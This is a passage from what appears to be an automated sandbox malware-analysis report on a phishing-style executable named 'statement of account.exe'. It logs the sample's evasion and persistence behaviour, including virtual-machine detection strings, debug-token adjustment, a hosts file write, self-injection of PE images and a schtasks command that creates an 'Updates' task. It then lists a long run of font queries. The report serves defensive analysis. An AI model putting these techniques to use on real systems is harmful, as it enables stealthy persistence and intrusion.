                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: statement of account.exe, 00000003.00000002.514549146.0000000001408000.00000004.00000020.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.553384981.0000000006BA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: LtdekfbHULJt.exe, 00000016.00000002.559565864.000000000638A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program Files
                Source: C:\Users\user\Desktop\statement of account.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\statement of account.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\statement of account.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\statement of account.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\statement of account.exeMemory written: C:\Users\user\Desktop\statement of account.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeMemory written: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeMemory written: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exeProcess created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Users\user\Desktop\statement of account.exe VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
